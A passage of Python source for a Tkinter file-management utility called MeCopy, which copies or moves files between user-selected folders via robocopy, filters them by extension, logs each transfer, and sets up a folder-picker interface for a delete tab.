Dst = win32api.GetShortPathName(Dst_Path_6.get())
Files_Extensions_Read = parser.get(
"Extensions", "Search_6").split(" ")
if parser.get("Paths_Src", "path_6") == parser.get("Paths_Dst", "path_6"):
messagebox.showwarning(message="ATTENTION: Origin and Destination are the same in (" +
parser.get("Path_Names", "path_name_6")+")", title="MeCopy")
sys.exit(0)
if parser.get("Paths_Src", "path_6") == ("C:/"):
Alert_Path = tk.messagebox.askyesno(title="MeCopy", message="ATTENTION: You have chosen as source path C: in (" + parser.get("Path_Names", "path_name_6") +
") This may cause problems when copying your files and some files may not be able to be copied and the operation may take a long time. We recommend that you choose more specific paths. Do you want to continue?")
if Alert_Path is False:
sys.exit(0)
progressbar = ttk.Progressbar(mode="indeterminate")
progressbar.place(x=1027, y=82, width=100)
progressbar.start(10)
Transfer_InProcress = tk.Label(
Move_Frame, bg="#dbdbdb", fg="#382d2b", text="Transfering...")
Transfer_InProcress.place(x=1080, y=60)
if RadioValue_6.get() == 0:
Call_Move = ["robocopy", Src, Dst, "/S",
"/ZB", "/XJ", "/R:0", "/W:0","/TEE", "/COPYALL", r"/log:logs\Log_Copy_6_" + Move_Module_Name_6.get() + ".txt"]
Call_Move.extend(Files_Extensions_Read)
call(Call_Move)
Log_Copy_6()
if RadioValue_6.get() == 1:
Call_Move = ["robocopy", Src, Dst, "/S",
"/ZB", "/XJ", "/R:0", "/W:0","/TEE", "/MOVE", r"/log:logs\Log_Move_6_" + Move_Module_Name_6.get() + ".txt"]
Call_Move.extend(Files_Extensions_Read)
call(Call_Move)
Log_Move_6()
progressbar.destroy()
Transfer_InProcress.destroy()
Transfer_Completed = tk.Label(
Move_Frame, bg="#dbdbdb", fg="#382d2b", text="Transfer completed at " + time.strftime("%H:%M:%S"))
Transfer_Completed.place(x=930, y=80)
except WindowsError:
pass
except SyntaxError:
pass
except ValueError:
pass
except TypeError:
pass
except FileNotFoundError:
Path_Error = messagebox.showwarning(
message="Path cannot be found (" + Src + ")", title="MeCopy")
pass
except pywintypes.error:
Path_Error = messagebox.showwarning(message="The source path or destination of "+parser.get(
"Path_Names", "path_name_6")+" is misspelled or do not exist.", title="MeCopy")
pass
def Transfer_Module_7():
parser.set("Paths_Src", "path_7", Src_Path_7.get())
parser.set("Paths_Dst", "path_7", Dst_Path_7.get())
parser.set("Extensions", "Search_7", Module_7_Extensions.get())
parser.set("Path_Names", "path_name_7", Move_Module_Name_7.get())
with open('config.ini', 'w') as myconfig:
parser.write(myconfig)
try:
Src = win32api.GetShortPathName(Src_Path_7.get())
Dst = win32api.GetShortPathName(Dst_Path_7.get())
Files_Extensions_Read = parser.get(
"Extensions", "Search_7").split(" ")
if parser.get("Paths_Src", "path_7") == parser.get("Paths_Dst", "path_7"):
messagebox.showwarning(message="ATTENTION: Origin and Destination are the same in (" +
parser.get("Path_Names", "path_name_7")+")", title="MeCopy")
sys.exit(0)
if parser.get("Paths_Src", "path_7") == ("C:/"):
Alert_Path = tk.messagebox.askyesno(title="MeCopy", message="ATTENTION: You have chosen as source path C: in (" + parser.get("Path_Names", "path_name_7") +
") This may cause problems when copying your files and some files may not be able to be copied and the operation may take a long time. We recommend that you choose more specific paths. Do you want to continue?")
if Alert_Path is False:
sys.exit(0)
progressbar = ttk.Progressbar(mode="indeterminate")
progressbar.place(x=1027, y=195, width=100)
progressbar.start(10)
Transfer_InProcress = tk.Label(
Move_Frame, bg="#dbdbdb", fg="#382d2b", text="Transfering...")
Transfer_InProcress.place(x=1080, y=174)
if RadioValue_7.get() == 0:
Call_Move = ["robocopy", Src, Dst, "/S",
"/ZB", "/XJ", "/R:0", "/W:0","/TEE", "/COPYALL", r"/log:logs\Log_Copy_7_" + Move_Module_Name_7.get() + ".txt"]
Call_Move.extend(Files_Extensions_Read)
call(Call_Move)
Log_Copy_7()
if RadioValue_7.get() == 1:
Call_Move = ["robocopy", Src, Dst, "/S",
"/ZB", "/XJ", "/R:0", "/W:0","/TEE", "/MOVE", r"/log:logs\Log_Move_7_" + Move_Module_Name_7.get() + ".txt"]
Call_Move.extend(Files_Extensions_Read)
call(Call_Move)
Log_Move_7()
progressbar.destroy()
Transfer_InProcress.destroy()
Transfer_Completed = tk.Label(
Move_Frame, bg="#dbdbdb", fg="#382d2b", text="Transfer completed at " + time.strftime("%H:%M:%S"))
Transfer_Completed.place(x=930, y=193)
except WindowsError:
pass
except SyntaxError:
pass
except ValueError:
pass
except TypeError:
pass
except FileNotFoundError:
Path_Error = messagebox.showwarning(
message="Path cannot be found (" + Src + ")", title="MeCopy")
pass
except pywintypes.error:
Path_Error = messagebox.showwarning(message="The source path or destination of "+parser.get(
"Path_Names", "path_name_7")+" is misspelled or do not exist.", title="MeCopy")
pass
def Transfer_Module_8():
parser.set("Paths_Src", "path_8", Src_Path_8.get())
parser.set("Paths_Dst", "path_8", Dst_Path_8.get())
parser.set("Extensions", "Search_8", Module_8_Extensions.get())
parser.set("Path_Names", "path_name_8", Move_Module_Name_8.get())
with open('config.ini', 'w') as myconfig:
parser.write(myconfig)
try:
Src = win32api.GetShortPathName(Src_Path_8.get())
Dst = win32api.GetShortPathName(Dst_Path_8.get())
Files_Extensions_Read = parser.get(
"Extensions", "Search_8").split(" ")
if parser.get("Paths_Src", "path_8") == parser.get("Paths_Dst", "path_8"):
messagebox.showwarning(message="ATTENTION: Origin and Destination are the same in (" +
parser.get("Path_Names", "path_name_8")+")", title="MeCopy")
sys.exit(0)
if parser.get("Paths_Src", "path_8") == ("C:/"):
Alert_Path = tk.messagebox.askyesno(title="MeCopy", message="ATTENTION: You have chosen as source path C: in (" + parser.get("Path_Names", "path_name_8") +
") This may cause problems when copying your files and some files may not be able to be copied and the operation may take a long time. We recommend that you choose more specific paths. Do you want to continue?")
if Alert_Path is False:
sys.exit(0)
progressbar = ttk.Progressbar(mode="indeterminate")
progressbar.place(x=1027, y=313, width=100)
progressbar.start(10)
Transfer_InProcress = tk.Label(
Move_Frame, bg="#dbdbdb", fg="#382d2b", text="Transfering...")
Transfer_InProcress.place(x=1080, y=290)
if RadioValue_8.get() == 0:
Call_Move = ["robocopy", Src, Dst, "/S",
"/ZB", "/XJ", "/R:0", "/W:0","/TEE", "/COPYALL", r"/log:logs\Log_Copy_8_" + Move_Module_Name_8.get() + ".txt"]
Call_Move.extend(Files_Extensions_Read)
call(Call_Move)
Log_Copy_8()
if RadioValue_8.get() == 1:
Call_Move = ["robocopy", Src, Dst, "/S",
"/ZB", "/XJ", "/R:0", "/W:0", "/TEE","/MOVE", r"/log:logs\Log_Move_8_" + Move_Module_Name_8.get() + ".txt"]
Call_Move.extend(Files_Extensions_Read)
call(Call_Move)
Log_Move_8()
progressbar.destroy()
Transfer_InProcress.destroy()
Transfer_Completed = tk.Label(
Move_Frame, bg="#dbdbdb", fg="#382d2b", text="Transfer completed at " + time.strftime("%H:%M:%S"))
Transfer_Completed.place(x=930, y=309)
except WindowsError:
pass
except SyntaxError:
pass
except ValueError:
pass
except TypeError:
pass
except FileNotFoundError:
Path_Error = messagebox.showwarning(
message="Path cannot be found (" + Src + ")", title="MeCopy")
pass
except pywintypes.error:
Path_Error = messagebox.showwarning(message="The source path or destination of "+parser.get(
"Path_Names", "path_name_8")+" is misspelled or do not exist.", title="MeCopy")
pass
def Transfer_Module_9():
parser.set("Paths_Src", "path_9", Src_Path_9.get())
parser.set("Paths_Dst", "path_9", Dst_Path_9.get())
parser.set("Extensions", "Search_9", Module_9_Extensions.get())
parser.set("Path_Names", "path_name_9", Move_Module_Name_9.get())
with open('config.ini', 'w') as myconfig:
parser.write(myconfig)
try:
Src = win32api.GetShortPathName(Src_Path_9.get())
Dst = win32api.GetShortPathName(Dst_Path_9.get())
Files_Extensions_Read = parser.get(
"Extensions", "Search_9").split(" ")
if parser.get("Paths_Src", "path_9") == parser.get("Paths_Dst", "path_9"):
messagebox.showwarning(message="ATTENTION: Origin and Destination are the same in (" +
parser.get("Path_Names", "path_name_9")+")", title="MeCopy")
sys.exit(0)
if parser.get("Paths_Src", "path_9") == ("C:/"):
Alert_Path = tk.messagebox.askyesno(title="MeCopy", message="ATTENTION: You have chosen as source path C: in (" + parser.get("Path_Names", "path_name_9") +
") This may cause problems when copying your files and some files may not be able to be copied and the operation may take a long time. We recommend that you choose more specific paths. Do you want to continue?")
if Alert_Path is False:
sys.exit(0)
progressbar = ttk.Progressbar(mode="indeterminate")
progressbar.place(x=1027, y=429, width=100)
progressbar.start(10)
Transfer_InProcress = tk.Label(
Move_Frame, bg="#dbdbdb", fg="#382d2b", text="Transfering...")
Transfer_InProcress.place(x=1080, y=406)
if RadioValue_9.get() == 0:
Call_Move = ["robocopy", Src, Dst, "/S",
"/ZB", "/XJ", "/R:0", "/W:0","/TEE", "/COPYALL", r"/log:logs\Log_Copy_9_" + Move_Module_Name_9.get() + ".txt"]
Call_Move.extend(Files_Extensions_Read)
call(Call_Move)
Log_Copy_9()
if RadioValue_9.get() == 1:
Call_Move = ["robocopy", Src, Dst, "/S",
"/ZB", "/XJ", "/R:0", "/W:0","/TEE", "/MOVE", r"/log:logs\Log_Move_9_" + Move_Module_Name_9.get() + ".txt"]
Call_Move.extend(Files_Extensions_Read)
call(Call_Move)
Log_Move_9()
progressbar.destroy()
Transfer_InProcress.destroy()
Transfer_Completed = tk.Label(
Move_Frame, bg="#dbdbdb", fg="#382d2b", text="Transfer completed at " + time.strftime("%H:%M:%S"))
Transfer_Completed.place(x=930, y=428)
except WindowsError:
pass
except SyntaxError:
pass
except ValueError:
pass
except TypeError:
pass
except FileNotFoundError:
Path_Error = messagebox.showwarning(
message="Path cannot be found (" + Src + ")", title="MeCopy")
pass
except pywintypes.error:
Path_Error = messagebox.showwarning(message="The source path or destination of "+parser.get(
"Path_Names", "path_name_9")+" is misspelled or do not exist.", title="MeCopy")
pass
def Transfer_Module_10():
parser.set("Paths_Src", "path_10", Src_Path_10.get())
parser.set("Paths_Dst", "path_10", Dst_Path_10.get())
parser.set("Extensions", "Search_10", Module_10_Extensions.get())
parser.set("Path_Names", "path_name_10", Move_Module_Name_10.get())
with open('config.ini', 'w') as myconfig:
parser.write(myconfig)
try:
Src = win32api.GetShortPathName(Src_Path_10.get())
Dst = win32api.GetShortPathName(Dst_Path_10.get())
Files_Extensions_Read = parser.get(
"Extensions", "Search_10").split(" ")
if parser.get("Paths_Src", "path_10") == parser.get("Paths_Dst", "path_10"):
messagebox.showwarning(message="ATTENTION: Origin and Destination are the same in (" +
parser.get("Path_Names", "path_name_10")+")", title="MeCopy")
sys.exit(0)
if parser.get("Paths_Src", "path_10") == ("C:/"):
Alert_Path = tk.messagebox.askyesno(title="MeCopy", message="ATTENTION: You have chosen as source path C: in (" + parser.get("Path_Names", "path_name_10") +
") This may cause problems when copying your files and some files may not be able to be copied and the operation may take a long time. We recommend that you choose more specific paths. Do you want to continue?")
if Alert_Path is False:
sys.exit(0)
progressbar = ttk.Progressbar(mode="indeterminate")
progressbar.place(x=1027, y=545, width=100)
progressbar.start(10)
Transfer_InProcress = tk.Label(
Move_Frame, bg="#dbdbdb", fg="#382d2b", text="Transfering...")
Transfer_InProcress.place(x=1080, y=522)
if RadioValue_10.get() == 0:
Call_Move = ["robocopy", Src, Dst, "/S",
"/ZB", "/XJ", "/R:0", "/W:0","/TEE", "/COPYALL", r"/log:logs\Log_Copy_10_" + Move_Module_Name_10.get() + ".txt"]
Call_Move.extend(Files_Extensions_Read)
call(Call_Move)
Log_Copy_10()
if RadioValue_10.get() == 1:
Call_Move = ["robocopy", Src, Dst, "/S",
"/ZB", "/XJ", "/R:0", "/W:0","/TEE", "/MOVE", r"/log:logs\Log_Move_10_" + Move_Module_Name_10.get() + ".txt"]
Call_Move.extend(Files_Extensions_Read)
call(Call_Move)
Log_Move_10()
progressbar.destroy()
Transfer_InProcress.destroy()
Transfer_Completed = tk.Label(
Move_Frame, bg="#dbdbdb", fg="#382d2b", text="Transfer completed at " + time.strftime("%H:%M:%S"))
Transfer_Completed.place(x=930, y=545)
except WindowsError:
pass
except SyntaxError:
pass
except ValueError:
pass
except TypeError:
pass
except FileNotFoundError:
Path_Error = messagebox.showwarning(
message="Path cannot be found (" + Src + ")", title="MeCopy")
pass
except pywintypes.error:
Path_Error = messagebox.showwarning(message="The source path or destination of "+parser.get(
"Path_Names", "path_name_10")+" is misspelled or do not exist.", title="MeCopy")
pass
# START_MOVE_THREADS
def schedule_check(Patch_1_Thread):
root.after(1000, check_if_done, Patch_1_Thread)
def check_if_done(Patch_1_Thread):
if not Patch_1_Thread.is_alive():
Btn_Move_1["state"] = "normal"
btnFind5["state"] = "normal"
else:
schedule_check(Patch_1_Thread)
def Move_1_Thread():
Btn_Move_1["state"] = "disabled"
btnFind5["state"] = "disabled"
Patch_1_Thread = threading.Thread(target=Transfer_Module_1)
Patch_1_Thread.start()
schedule_check(Patch_1_Thread)
def schedule_check_2(Patch_2_Thread):
root.after(1000, check_if_done_2, Patch_2_Thread)
def check_if_done_2(Patch_2_Thread):
if not Patch_2_Thread.is_alive():
Btn_Move_2["state"] = "normal"
btnFind5["state"] = "normal"
else:
schedule_check_2(Patch_2_Thread)
def Move_2_Thread():
Btn_Move_2["state"] = "disabled"
btnFind5["state"] = "disabled"
Patch_2_Thread = threading.Thread(target=Transfer_Module_2)
Patch_2_Thread.start()
schedule_check_2(Patch_2_Thread)
def schedule_check_3(Patch_3_Thread):
root.after(1000, check_if_done_3, Patch_3_Thread)
def check_if_done_3(Patch_3_Thread):
if not Patch_3_Thread.is_alive():
Btn_Move_3["state"] = "normal"
btnFind5["state"] = "normal"
else:
schedule_check_3(Patch_3_Thread)
def Move_3_Thread():
Btn_Move_3["state"] = "disabled"
btnFind5["state"] = "disabled"
Patch_3_Thread = threading.Thread(target=Transfer_Module_3)
Patch_3_Thread.start()
schedule_check_3(Patch_3_Thread)
def schedule_check_4(Patch_4_Thread):
root.after(1000, check_if_done_4, Patch_4_Thread)
def check_if_done_4(Patch_4_Thread):
if not Patch_4_Thread.is_alive():
Btn_Move_4["state"] = "normal"
btnFind5["state"] = "normal"
else:
schedule_check_4(Patch_4_Thread)
def Move_4_Thread():
Btn_Move_4["state"] = "disabled"
btnFind5["state"] = "disabled"
Patch_4_Thread = threading.Thread(target=Transfer_Module_4)
Patch_4_Thread.start()
schedule_check_4(Patch_4_Thread)
def schedule_check_5(Patch_5_Thread):
root.after(1000, check_if_done_5, Patch_5_Thread)
def check_if_done_5(Patch_5_Thread):
if not Patch_5_Thread.is_alive():
Btn_Move_5["state"] = "normal"
btnFind5["state"] = "normal"
else:
schedule_check_5(Patch_5_Thread)
def Move_5_Thread():
Btn_Move_5["state"] = "disabled"
btnFind5["state"] = "disabled"
Patch_5_Thread = threading.Thread(target=Transfer_Module_5)
Patch_5_Thread.start()
schedule_check_5(Patch_5_Thread)
def schedule_check_6(Patch_6_Thread):
root.after(1000, check_if_done_6, Patch_6_Thread)
def check_if_done_6(Patch_6_Thread):
if not Patch_6_Thread.is_alive():
Btn_Move_6["state"] = "normal"
btnFind5["state"] = "normal"
else:
schedule_check_6(Patch_6_Thread)
def Move_6_Thread():
Btn_Move_6["state"] = "disabled"
btnFind5["state"] = "disabled"
Patch_6_Thread = threading.Thread(target=Transfer_Module_6)
Patch_6_Thread.start()
schedule_check_6(Patch_6_Thread)
def schedule_check_7(Patch_7_Thread):
root.after(1000, check_if_done_7, Patch_7_Thread)
def check_if_done_7(Patch_7_Thread):
if not Patch_7_Thread.is_alive():
Btn_Move_7["state"] = "normal"
btnFind5["state"] = "normal"
else:
schedule_check_7(Patch_7_Thread)
def Move_7_Thread():
Btn_Move_7["state"] = "disabled"
btnFind5["state"] = "disabled"
Patch_7_Thread = threading.Thread(target=Transfer_Module_7)
Patch_7_Thread.start()
schedule_check_7(Patch_7_Thread)
def schedule_check_8(Patch_8_Thread):
root.after(1000, check_if_done_8, Patch_8_Thread)
def check_if_done_8(Patch_8_Thread):
if not Patch_8_Thread.is_alive():
Btn_Move_8["state"] = "normal"
btnFind5["state"] = "normal"
else:
schedule_check_8(Patch_8_Thread)
def Move_8_Thread():
Btn_Move_8["state"] = "disabled"
btnFind5["state"] = "disabled"
Patch_8_Thread = threading.Thread(target=Transfer_Module_8)
Patch_8_Thread.start()
schedule_check_8(Patch_8_Thread)
def schedule_check_9(Patch_9_Thread):
root.after(1000, check_if_done_9, Patch_9_Thread)
def check_if_done_9(Patch_9_Thread):
if not Patch_9_Thread.is_alive():
Btn_Move_9["state"] = "normal"
btnFind5["state"] = "normal"
else:
schedule_check_9(Patch_9_Thread)
def Move_9_Thread():
Btn_Move_9["state"] = "disabled"
btnFind5["state"] = "disabled"
Patch_9_Thread = threading.Thread(target=Transfer_Module_9)
Patch_9_Thread.start()
schedule_check_9(Patch_9_Thread)
def schedule_check_10(Patch_10_Thread):
root.after(1000, check_if_done_10, Patch_10_Thread)
def check_if_done_10(Patch_10_Thread):
if not Patch_10_Thread.is_alive():
Btn_Move_10["state"] = "normal"
btnFind5["state"] = "normal"
else:
schedule_check_10(Patch_10_Thread)
def Move_10_Thread():
Btn_Move_10["state"] = "disabled"
btnFind5["state"] = "disabled"
Patch_10_Thread = threading.Thread(target=Transfer_Module_10)
Patch_10_Thread.start()
schedule_check_10(Patch_10_Thread)
# END_MOVE_THREADS
# DEL_SRC_REQUEST_START
def Get_Src_Del_1():
Src_Del_Path_Selected = filedialog.askdirectory()
Src_Del_Path.set(Src_Del_Path_Selected)
Src_Del_Path = tk.StringVar()
Del_Extensions_1 = tk.StringVar()
Path_Name_Del_1 = tk.StringVar()
Src_Del_Path.set(parser.get("Paths_Src_2", "path_1"))
Src_Title_Del_1 = tk.Label(Delete_Frame, text="Search in:", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=64, y=19)
Patch_Del_Entry_1 = EntryEx(
Delete_Frame, style="EntryStyle.TEntry", textvariable=Src_Del_Path).place(x=155, y=22)
Button_Search_Path_Del_1 = ttk.Button(
Delete_Frame, text="Search", style="flat.TButton", command=Get_Src_Del_1).place(x=282, y=21)
Path_Name_Del_1.set(parser.get("Path_Names_2", "path_name_1"))
Del_Extensions_1.set(parser.get("Extensions_2", "Search_1"))
Entry_Path_Del_1 = EntryEx(Delete_Frame, font="Helvetica 10 bold", width=27,
style="EntryStyle.TEntry_Paths", textvariable=Path_Name_Del_1).place(x=165, y=0)
Ext_Search_Del_1 = tk.Label(Delete_Frame, text="Extensions", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=380, y=0)
Entry_Del_Extensions_1 = EntryEx(
Delete_Frame, style="EntryStyle.TEntry", textvariable=Del_Extensions_1).place(x=370, y=22)
def Get_Src_Del_2():
Src_Del_Path_Selected_2 = filedialog.askdirectory()
Src_Del_Path_2.set(Src_Del_Path_Selected_2)
Src_Del_Path_2 = tk.StringVar()
Del_Extensions_2 = tk.StringVar()
Path_Name_Del_2 = tk.StringVar()
Src_Del_Path_2.set(parser.get("Paths_Src_2", "path_2"))
Src_Title_Del_2 = tk.Label(Delete_Frame, text="Search in:", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=64, y=130)
Patch_Del_Entry_2 = EntryEx(Delete_Frame, style="EntryStyle.TEntry",
textvariable=Src_Del_Path_2).place(x=155, y=133)
Button_Search_Path_Del_2 = ttk.Button(
Delete_Frame, text="Search", style="flat.TButton", command=Get_Src_Del_2).place(x=282, y=132)
Path_Name_Del_2.set(parser.get("Path_Names_2", "path_name_2"))
Del_Extensions_2.set(parser.get("Extensions_2", "Search_2"))
Entry_Path_Del_2 = EntryEx(Delete_Frame, font="Helvetica 10 bold", width=27,
style="EntryStyle.TEntry_Paths", textvariable=Path_Name_Del_2).place(x=165, y=112)
Ext_Search_Del_2 = tk.Label(Delete_Frame, text="Extensions", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=380, y=110)
Entry_Del_Extensions_2 = EntryEx(
Delete_Frame, style="EntryStyle.TEntry", textvariable=Del_Extensions_2).place(x=370, y=133)
def Get_Src_Del_3():
Src_Del_Path_Selected_3 = filedialog.askdirectory()
Src_Del_Path_3.set(Src_Del_Path_Selected_3)
Src_Del_Path_3 = tk.StringVar()
Del_Extensions_3 = tk.StringVar()
Path_Name_Del_3 = tk.StringVar()
Src_Del_Path_3.set(parser.get("Paths_Src_2", "path_3"))
Src_Title_Del_3 = tk.Label(Delete_Frame, text="Search in:", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=64, y=247)
Patch_Del_Entry_3 = EntryEx(Delete_Frame, style="EntryStyle.TEntry",
textvariable=Src_Del_Path_3).place(x=155, y=250)
Button_Search_Path_Del_3 = ttk.Button(
Delete_Frame, text="Search", style="flat.TButton", command=Get_Src_Del_3).place(x=282, y=249)
Path_Name_Del_3.set(parser.get("Path_Names_2", "path_name_3"))
Del_Extensions_3.set(parser.get("Extensions_2", "Search_3"))
Entry_Path_Del_3 = EntryEx(Delete_Frame, font="Helvetica 10 bold", width=27,
style="EntryStyle.TEntry_Paths", textvariable=Path_Name_Del_3).place(x=165, y=225)
Ext_Search_Del_3 = tk.Label(Delete_Frame, text="Extensions", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=380, y=228)
Entry_Del_Extensions_3 = EntryEx(
Delete_Frame, style="EntryStyle.TEntry", textvariable=Del_Extensions_3).place(x=370, y=251)
def Get_Src_Del_4():
Src_Del_Path_Selected_4 = filedialog.askdirectory()
Src_Del_Path_4.set(Src_Del_Path_Selected_4)
Src_Del_Path_4 = tk.StringVar()
Del_Extensions_4 = tk.StringVar()
Path_Name_Del_4 = tk.StringVar()
Src_Del_Path_4.set(parser.get("Paths_Src_2", "path_4"))
Src_Title_Del_4 = tk.Label(Delete_Frame, text="Search in:", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=64, y=365)
Patch_Del_Entry_4 = EntryEx(Delete_Frame, style="EntryStyle.TEntry",
textvariable=Src_Del_Path_4).place(x=155, y=369)
Button_Search_Path_Del_4 = ttk.Button(
Delete_Frame, text="Search", style="flat.TButton", command=Get_Src_Del_4).place(x=282, y=368)
Path_Name_Del_4.set(parser.get("Path_Names_2", "path_name_4"))
Del_Extensions_4.set(parser.get("Extensions_2", "Search_4"))
Entry_Path_Del_4 = EntryEx(Delete_Frame, font="Helvetica 10 bold", width=27,
style="EntryStyle.TEntry_Paths", textvariable=Path_Name_Del_4).place(x=165, y=345)
Ext_Search_Del_4 = tk.Label(Delete_Frame, text="Extensions", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=380, y=347)
Entry_Del_Extensions_4 = EntryEx(
Delete_Frame, style="EntryStyle.TEntry", textvariable=Del_Extensions_4).place(x=370, y=369)
def Get_Src_Del_5():
Src_Del_Path_Selected_5 = filedialog.askdirectory()
Src_Del_Path_5.set(Src_Del_Path_Selected_5)
Src_Del_Path_5 = tk.StringVar()
Del_Extensions_5 = tk.StringVar()
Path_Name_Del_5 = tk.StringVar()
Src_Del_Path_5.set(parser.get("Paths_Src_2", "path_5"))
Src_Title_Del_5 = tk.Label(Delete_Frame, text="Search in:", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=64, y=481)
Patch_Del_Entry_5 = EntryEx(Delete_Frame, style="EntryStyle.TEntry",
textvariable=Src_Del_Path_5).place(x=155, y=485)
Button_Search_Path_Del_5 = ttk.Button(
Delete_Frame, text="Search", style="flat.TButton", command=Get_Src_Del_5).place(x=282, y=484)
Path_Name_Del_5.set(parser.get("Path_Names_2", "path_name_5"))
Del_Extensions_5.set(parser.get("Extensions_2", "Search_5"))
Entry_Path_Del_5 = EntryEx(Delete_Frame, font="Helvetica 10 bold", width=27,
style="EntryStyle.TEntry_Paths", textvariable=Path_Name_Del_5).place(x=165, y=462)
Ext_Search_Del_5 = tk.Label(Delete_Frame, text="Extensions", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=380, y=463)
Entry_Del_Extensions_5 = EntryEx(
Delete_Frame, style="EntryStyle.TEntry", textvariable=Del_Extensions_5).place(x=370, y=486)
def Get_Src_Del_6():
Src_Del_Path_Selected_6 = filedialog.askdirectory()
Src_Del_Path_6.set(Src_Del_Path_Selected_6)
Src_Del_Path_6 = tk.StringVar()
Del_Extensions_6 = tk.StringVar()
Path_Name_Del_6 = tk.StringVar()
Src_Del_Path_6.set(parser.get("Paths_Src_2", "path_6"))
Src_Title_Del_6 = tk.Label(Delete_Frame, text="Search in:", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=654, y=19)
Patch_Del_Entry_6 = EntryEx(Delete_Frame, style="EntryStyle.TEntry",
textvariable=Src_Del_Path_6).place(x=746, y=22)
Button_Search_Path_Del_6 = ttk.Button(
Delete_Frame, text="Search", style="flat.TButton", command=Get_Src_Del_6).place(x=873, y=21)
Path_Name_Del_6.set(parser.get("Path_Names_2", "path_name_6"))
Del_Extensions_6.set(parser.get("Extensions_2", "Search_6"))
Entry_Path_Del_6 = EntryEx(Delete_Frame, font="Helvetica 10 bold", width=27,
style="EntryStyle.TEntry_Paths", textvariable=Path_Name_Del_6).place(x=755, y=0)
Ext_Search_Del_6 = tk.Label(Delete_Frame, text="Extensions", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=970, y=0)
Entry_Del_Extensions_6 = EntryEx(
Delete_Frame, style="EntryStyle.TEntry", textvariable=Del_Extensions_6).place(x=960, y=23)
def Get_Src_Del_7():
Src_Del_Path_Selected_7 = filedialog.askdirectory()
Src_Del_Path_7.set(Src_Del_Path_Selected_7)
Src_Del_Path_7 = tk.StringVar()
Del_Extensions_7 = tk.StringVar()
Path_Name_Del_7 = tk.StringVar()
Src_Del_Path_7.set(parser.get("Paths_Src_2", "path_7"))
Src_Title_Del_7 = tk.Label(Delete_Frame, text="Search in:", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=654, y=130)
Patch_Del_Entry_7 = EntryEx(Delete_Frame, style="EntryStyle.TEntry",
textvariable=Src_Del_Path_7).place(x=746, y=133)
Button_Search_Path_Del_7 = ttk.Button(
Delete_Frame, text="Search", style="flat.TButton", command=Get_Src_Del_7).place(x=873, y=132)
Path_Name_Del_7.set(parser.get("Path_Names_2", "path_name_7"))
Del_Extensions_7.set(parser.get("Extensions_2", "Search_7"))
Entry_Path_Del_7 = EntryEx(Delete_Frame, font="Helvetica 10 bold", width=27,
style="EntryStyle.TEntry_Paths", textvariable=Path_Name_Del_7).place(x=755, y=112)
Ext_Search_Del_7 = tk.Label(Delete_Frame, text="Extensions", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=970, y=110)
Entry_Del_Extensions_7 = EntryEx(
Delete_Frame, style="EntryStyle.TEntry", textvariable=Del_Extensions_7).place(x=960, y=134)
def Get_Src_Del_8():
Src_Del_Path_Selected_8 = filedialog.askdirectory()
Src_Del_Path_8.set(Src_Del_Path_Selected_8)
Src_Del_Path_8 = tk.StringVar()
Del_Extensions_8 = tk.StringVar()
Path_Name_Del_8 = tk.StringVar()
Src_Del_Path_8.set(parser.get("Paths_Src_2", "path_8"))
Src_Title_Del_8 = tk.Label(Delete_Frame, text="Search in:", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=654, y=247)
Patch_Del_Entry_8 = EntryEx(Delete_Frame, style="EntryStyle.TEntry",
textvariable=Src_Del_Path_8).place(x=746, y=250)
Button_Search_Path_Del_8 = ttk.Button(
Delete_Frame, text="Search", style="flat.TButton", command=Get_Src_Del_8).place(x=873, y=249)
Path_Name_Del_8.set(parser.get("Path_Names_2", "path_name_8"))
Del_Extensions_8.set(parser.get("Extensions_2", "Search_8"))
Entry_Path_Del_8 = EntryEx(Delete_Frame, font="Helvetica 10 bold", width=27,
style="EntryStyle.TEntry_Paths", textvariable=Path_Name_Del_8).place(x=755, y=225)
Ext_Search_Del_8 = tk.Label(Delete_Frame, text="Extensions", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=970, y=228)
Entry_Del_Extensions_8 = EntryEx(
Delete_Frame, style="EntryStyle.TEntry", textvariable=Del_Extensions_8).place(x=960, y=251)
def Get_Src_Del_9():
Src_Del_Path_Selected_9 = filedialog.askdirectory()
Src_Del_Path_9.set(Src_Del_Path_Selected_9)
Src_Del_Path_9 = tk.StringVar()
Del_Extensions_9 = tk.StringVar()
Path_Name_Del_9 = tk.StringVar()
Src_Del_Path_9.set(parser.get("Paths_Src_2", "path_9"))
Src_Title_Del_9 = tk.Label(Delete_Frame, text="Search in:", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=654, y=365)
Patch_Del_Entry_9 = EntryEx(Delete_Frame, style="EntryStyle.TEntry",
textvariable=Src_Del_Path_9).place(x=746, y=369)
Button_Search_Path_Del_9 = ttk.Button(
Delete_Frame, text="Search", style="flat.TButton", command=Get_Src_Del_9).place(x=873, y=368)
Path_Name_Del_9.set(parser.get("Path_Names_2", "path_name_9"))
Del_Extensions_9.set(parser.get("Extensions_2", "Search_9"))
Entry_Path_Del_9 = EntryEx(Delete_Frame, font="Helvetica 10 bold", width=27,
style="EntryStyle.TEntry_Paths", textvariable=Path_Name_Del_9).place(x=755, y=345)
Ext_Search_Del_9 = tk.Label(Delete_Frame, text="Extensions", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=970, y=347)
Entry_Del_Extensions_9 = EntryEx(
Delete_Frame, style="EntryStyle.TEntry", textvariable=Del_Extensions_9).place(x=960, y=370)
def Get_Src_Del_10():
Src_Del_Path_Selected_10 = filedialog.askdirectory()
